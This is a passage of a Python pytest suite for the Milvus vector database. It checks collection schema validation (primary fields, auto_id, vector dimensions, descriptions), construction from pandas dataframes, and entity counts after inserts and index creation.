self.collection_schema_wrap.init_collection_schema(fields, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("is_primary", ct.get_invalid_strs)
def test_collection_invalid_is_primary(self, is_primary):
"""
target: test collection with invalid primary
method: define field with is_primary=non-bool
expected: raise exception
"""
self._connect()
name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Param is_primary must be bool type"}
self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=is_primary,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("primary_field", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_primary_field(self, primary_field):
"""
target: test collection with invalid primary_field
method: specify invalid string primary_field in collection schema
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("primary_field", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_non_string_primary_field(self, primary_field):
"""
target: test collection with non-string primary_field
method: primary_field type is not string
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_not_existed_primary_field(self):
"""
target: test collection with not exist primary field
method: specify not existed field as primary_field
expected: raise exception
"""
self._connect()
fake_field = cf.gen_unique_str()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=fake_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_schema(self):
"""
target: test collection with primary field
method: specify primary field in CollectionSchema
expected: collection.primary_field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_field(self):
"""
target: test collection with primary field
method: specify primary field in FieldSchema
expected: collection.primary_field
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(), cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
self.collection_wrap.init_collection(cf.gen_unique_str(prefix), schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_unsupported_primary_field(self, get_unsupported_primary_field):
"""
target: test collection with unsupported primary field type
method: specify non-int64 as primary field
expected: raise exception
"""
self._connect()
field = get_unsupported_primary_field
vec_field = cf.gen_float_vec_field(name="vec")
error = {ct.err_code: 1, ct.err_msg: "Primary key type must be DataType.INT64."}
self.collection_schema_wrap.init_collection_schema(fields=[field, vec_field], primary_field=field.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_primary_fields(self):
"""
target: test collection with multi primary
method: collection with two primary fields
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2", is_primary=True)
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one."}
self.collection_schema_wrap.init_collection_schema(
fields=[int_field_one, int_field_two, cf.gen_float_vec_field()],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_inconsistent(self):
"""
target: test collection with different primary field setting
method: 1. set A field is_primary 2. set primary_field is B
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one"}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=int_field_two.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_consistent(self):
"""
target: test collection with both collection schema and field schema
method: 1. set A field is_primary 2.set primary_field is A
expected: verify primary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field(is_primary=True)
schema = cf.gen_collection_schema(fields=[int_field_one, cf.gen_float_vec_field()],
primary_field=int_field_one.name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_field_schema(self, auto_id):
"""
target: test collection with auto_id in field schema
method: specify auto_id True in field schema
expected: verify schema's auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field])
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_collection_schema(self, auto_id):
"""
target: test collection with auto_id in collection schema
method: specify auto_id True in collection schema
expected: verify schema auto_id and collection schema
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_auto_id_non_primary_field(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_false_non_primary(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=False in non-primary field
expected: verify schema auto_id is False
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name='int2', auto_id=False)
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
assert not schema.auto_id
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_inconsistent(self):
"""
target: test collection auto_id with both collection schema and field schema
method: 1.set primary field auto_id=True in field schema 2.set auto_id=False in collection schema
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "The auto_id of the collection is inconsistent with "
"the auto_id of the primary key field"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_consistent(self, auto_id):
"""
target: test collection auto_id with both collection schema and field schema
method: set auto_id=True/False both field and schema
expected: verify auto_id
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_none_in_field(self):
"""
target: test collection with auto_id is None
method: set auto_id=None
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
is_primary=True,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("auto_id", ct.get_invalid_strs)
def test_collection_invalid_auto_id(self, auto_id):
"""
target: test collection with invalid auto_id
method: define field with auto_id=non-bool
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_fields_auto_id(self):
"""
target: test collection auto_id with multi fields
method: specify auto_id=True for multi int64 fields
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
cf.gen_int64_field(is_primary=True, auto_id=True)
self.field_schema_wrap.init_field_schema(name="int", dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dtype", [DataType.FLOAT_VECTOR, DataType.BINARY_VECTOR])
def test_collection_vector_without_dim(self, dtype):
"""
target: test collection without dimension
method: define vector field without dim
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field, _ = self.field_schema_wrap.init_field_schema(name="vec", dtype=dtype)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "dimension is not defined in field type params"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_vector_invalid_dim(self, get_invalid_dim):
"""
target: test collection with invalid dimension
method: define float-vec field with invalid dimension
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=get_invalid_dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: f'invalid dim: {get_invalid_dim}'}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dim", [-1, 0, 32769])
def test_collection_vector_out_bounds_dim(self, dim):
"""
target: test collection with out of bounds dim
method: invalid dims -1, 0 and 32769
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "invalid dimension: {}. should be in range 1 ~ 32768".format(dim)}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_non_vector_field_dim(self):
"""
target: test collection with dim for non-vector field
method: define int64 field with dim
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
dim=ct.default_dim)
float_vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[int_field, float_vec_field],
primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_desc(self):
"""
target: test collection with description
method: create with description
expected: assert default description
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_none_desc(self):
"""
target: test collection with none description
method: create with none description
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=None)
error = {ct.err_code: 1, ct.err_msg: "None has type NoneType, but expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_long_desc(self):
"""
target: test collection with long desc
method: create with long desc
expected: create successfully
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
desc = "a".join("a" for _ in range(256))
schema = cf.gen_default_collection_schema(description=desc)
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_binary(self):
"""
target: test collection with binary-vec
method: create collection with binary field
expected: assert binary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_binary_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert c_name in self.utility_wrap.list_collections()[0]
class TestCollectionOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test collection interface operations
******************************************************************
"""
# def teardown_method(self):
# if self.self.collection_wrap is not None and self.self.collection_wrap.collection is not None:
# self.self.collection_wrap.drop()
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_connection(self):
"""
target: test collection without connection
method: 1.create collection after connection removed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.err_res, check_items=error)
assert self.collection_wrap.collection is None
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_create_drop(self):
"""
target: test cycle creation and deletion of multiple collections
method: in a loop, collections are created and deleted sequentially
expected: no exception
"""
self._connect()
c_num = 20
for _ in range(c_num):
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert c_name not in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_drop(self):
"""
target: test collection with dup name, and drop
method: 1. two dup name collection object
2. one object drop collection
expected: collection dropped
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
error = {ct.err_code: 1, ct.err_msg: f'HasPartition failed: can\'t find collection: {c_name}'}
collection_w.has_partition("p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_after_drop(self):
"""
target: test create collection after create and drop
method: 1. create a 2. drop a 3. re-create a
expected: no exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
collection_w.drop()
assert not self.utility_wrap.has_collection(collection_w.name)[0]
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_all_datatype_fields(self):
"""
target: test create collection with all dataType fields
method: create collection with all dataType schema
expected: create successfully
"""
self._connect()
fields = []
for k, v in DataType.__members__.items():
if v and v != DataType.UNKNOWN and v != DataType.FLOAT_VECTOR and v != DataType.BINARY_VECTOR:
field, _ = self.field_schema_wrap.init_field_schema(name=k.lower(), dtype=v)
fields.append(field)
fields.append(cf.gen_float_vec_field())
schema, _ = self.collection_schema_wrap.init_collection_schema(fields,
primary_field=ct.default_int64_field_name)
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
class TestCollectionDataframe(TestcaseBase):
"""
******************************************************************
The following cases are used to test construct_from_dataframe
******************************************************************
"""
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_df(self, request):
if request.param is None:
pytest.skip("skip None")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_dataframe(self):
"""
target: test collection with dataframe data
method: create collection and insert with dataframe
expected: collection num entities equal to nb
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([c_name])
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_binary_dataframe(self):
"""
target: test binary collection with dataframe
method: create binary collection with dataframe
expected: collection num entities equal to nb
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df, _ = cf.gen_default_binary_dataframe_data(nb=ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_none_dataframe(self):
"""
target: test create collection by None dataframe
method: pass None as the dataframe when creating the collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Dataframe can not be None."}
self.collection_wrap.construct_from_dataframe(c_name, None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_only_column(self):
"""
target: test collection with dataframe only columns
method: dataframe only has columns
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame(columns=[ct.default_int64_field_name, ct.default_float_vec_field_name])
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_inconsistent_dataframe(self):
"""
target: test collection with data inconsistent
method: create and insert with inconsistent data
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
# one field different type df
mix_data = [(1, 2., [0.1, 0.2]), (2, 3., 4)]
df = pd.DataFrame(data=mix_data, columns=list("ABC"))
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field='A', check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_non_dataframe(self, get_non_df):
"""
target: test create collection by invalid dataframe
method: non-dataframe type create collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Data type must be pandas.DataFrame."}
df = get_non_df
self.collection_wrap.construct_from_dataframe(c_name, df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_data_type_dataframe(self):
"""
target: test collection with invalid dataframe
method: create with invalid dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({"date": pd.date_range('20210101', periods=3), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_invalid_field_name(self):
"""
target: test collection with invalid field name
method: create with invalid field name dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({'%$#': cf.gen_vectors(3, 2), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_none_primary_field(self):
"""
target: test collection with none primary field
method: primary_field is none
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Schema must have a primary key field."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=None,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_not_existed_primary_field(self):
"""
target: test collection with not existed primary field
method: primary field not existed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=c_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_with_none_auto_id(self):
"""
target: test construct with auto_id=None
method: construct_from_dataframe with auto_id=None
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and insert values
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: "Auto_id is True, primary field should not have data."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_no_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and no ids inserted (primary field values are all None)
expected: verify num entities
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
# df.drop(ct.default_int64_field_name, axis=1, inplace=True)
df[ct.default_int64_field_name] = None
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True)
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_value_auto_id_true(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=true
expected: todo
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=True)
mutation_res = res[1]
assert cf._check_primary_keys(mutation_res.primary_keys, 100)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false(self):
"""
target: test construct with false auto_id
method: auto_id=False, primary_field correct
expected: verify auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=False)
assert not self.collection_wrap.schema.auto_id
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_none_value_auto_id_false(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=false
expected: raise exception
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
error = {ct.err_code: 0, ct.err_msg: "Primary key type must be DataType.INT64"}
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_same_values(self):
"""
target: test construct with false auto_id and same value
method: auto_id=False, primary field same values
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[1:, 0] = 1
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
collection_w = res[0]
assert collection_w.num_entities == nb
mutation_res = res[1]
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_negative_values(self):
"""
target: test construct with negative values
method: auto_id=False, primary field values is negative
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
new_values = pd.Series(data=[i for i in range(0, -nb, -1)])
df[ct.default_int64_field_name] = new_values
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_dup_name(self):
"""
target: test collection with dup name and insert dataframe
method: create collection with dup name, none schema, dataframe
expected: two collection objects are correct
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([collection_w.name])
assert collection_w.num_entities == ct.default_nb
assert collection_w.num_entities == self.collection_wrap.num_entities
class TestCollectionCount:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
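# dis_connect is assumed to be a fixture that yields a client whose connection has been closed, so any RPC made through it should fail.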
@pytest.mark.tags(CaseLabel.L2)
def test_count_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.count_entities(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_no_vectors(self, connect, collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 0
class TestCollectionCountIP:
"""
params mean different nb values; an nb value may or may not trigger a segment merge
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
request.param.update({"metric_type": "IP"})
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_after_index_created(self, connect, collection, get_simple_index, insert_count):
"""
target: test count_entities, after index has been created
method: add vectors in db, and create index, then call count_entities with correct params
expected: count_entities returns the correct row count
"""
entities = gen_entities(insert_count)
connect.insert(collection, entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
class TestCollectionCountBinary:
"""
params mean different nb values; an nb value may or may not trigger a segment merge
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
request.param["metric_type"] = "HAMMING"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
request.param["metric_type"] = "SUBSTRUCTURE"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
request.param["metric_type"] = "SUPERSTRUCTURE"
return request.param
# TODO: need to update and enable
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_after_index_created_A(self, connect, binary_collection, get_hamming_index, insert_count):
"""
target: test count_entities, after index has been created
method: add binary vectors in db, and create index, then call count_entities with correct params
expected: count_entities returns the correct row count
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
connect.flush([binary_collection])
# connect.load_collection(binary_collection)
connect.create_index(binary_collection, default_binary_vec_field_name, get_hamming_index)
